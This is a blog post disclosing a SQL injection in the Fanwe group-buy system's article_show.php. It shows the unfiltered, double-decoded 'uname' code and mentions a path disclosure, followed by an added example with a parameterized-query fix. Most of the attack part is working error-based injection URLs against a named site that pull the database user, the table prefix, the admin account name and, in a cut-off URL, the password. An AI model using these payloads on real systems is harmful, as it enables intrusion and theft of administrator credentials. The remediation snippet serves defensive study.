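I used to use the free version of this group-buy system; for some reason it now seems to have started charging. This vulnerability has also persisted across several of the lower versions! Vulnerable file: app/source/article_show.php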

<?php
    if ($_REQUEST['m'] == 'Article' && $_REQUEST['a'] == 'showByUname') {
            $uname = $_REQUEST['uname'];    // no filtering
            if ($uname != '')
            {
                    $uname = rawurldecode($uname); // decoded after GPC has run, so magic_quotes_gpc does not affect it

                    // .......... remaining code omitted
            }
    }

Such an obvious injection has survived N versions...

There is also a path disclosure vulnerability: mapi/comm.php

exp:

http://www.sitedirsec.com//index.php?m=Article&a=showByUname&uname=%2527or%201=%28select%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28select%20user%28%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%2523

Get the first table, mainly for the prefix:

http://www.sitedirsec.com//index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20from%20%28select%20count%28*%29%2Cconcat%28floor%28rand%280%29*2%29%2C%28select%20table_name%20from+information_schema.columns+where+table_schema%3Ddatabase%28%29%20limit%200%2C1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23

Get the account name:

http://www.sitedirsec.com/index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20from%20%28select%20count%28*%29%2Cconcat%28floor%28rand%280%29*2%29%2C%28select%20adm_name%20from%20fanwe_admin%20limit%200%2C1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%2

Get the password; the value has to be truncated here, and I don't know why either:

http://www.sitedirsec.com/index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20fr
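How the `rawurldecode()` call after GPC processing brings back an unescaped quote, and the same lookup done with a bound parameter, as an added example that is not code from the original post or from Fanwe. The `gpc_escape()` helper, the `demo_article` table and the sample value are constructed for illustration, and the script assumes PHP with the pdo_sqlite extension.

```php
<?php
// Added example; demo_article, gpc_escape() and find_by_uname() are
// hypothetical names, not Fanwe's schema or code.

// Stand-in for magic_quotes_gpc, which escaped request values on old PHP.
function gpc_escape(string $v): string {
    return addslashes($v);
}

// Constructed input: the URL carried uname=O%2527Brien (double-encoded quote).
$afterRequestDecode = rawurldecode('O%2527Brien'); // PHP's own decode: %25 becomes %
$afterGpc = gpc_escape($afterRequestDecode);       // sees "%27", no quote to escape
$uname = rawurldecode($afterGpc);                  // second decode yields a raw quote

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE demo_article (id INTEGER PRIMARY KEY, uname TEXT, title TEXT)');
$db->exec("INSERT INTO demo_article (uname, title) VALUES ('O''Brien', 'sample row')");

// Pattern the page describes: the decoded value is concatenated into SQL.
$unsafeSql = "SELECT title FROM demo_article WHERE uname = '" . $uname . "'";
try {
    $db->query($unsafeSql);
    echo "concatenated: statement accepted\n";
} catch (PDOException $e) {
    // The input's quote closed the string literal and changed the statement.
    echo "concatenated: input altered the SQL structure\n";
}

// Hardened form: validate length, then bind the value instead of splicing it.
function find_by_uname(PDO $db, string $uname): array {
    if ($uname === '' || strlen($uname) > 64) {
        return [];
    }
    $stmt = $db->prepare('SELECT title FROM demo_article WHERE uname = :uname');
    $stmt->execute([':uname' => $uname]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

echo "bound parameter: ", count(find_by_uname($db, $uname)), " row(s) matched\n";
```

Escaping applied before the final decode step never sees the quote, which is why the value has to be bound (or escaped) at the point where the query is built.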

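All articles on this blog are original unless otherwise noted.
When copying or reposting, please credit 起风了 with a hyperlink. Original post: "Fanwe group-buy system SQL vulnerability affects up to the latest version 4.2 – Website Security"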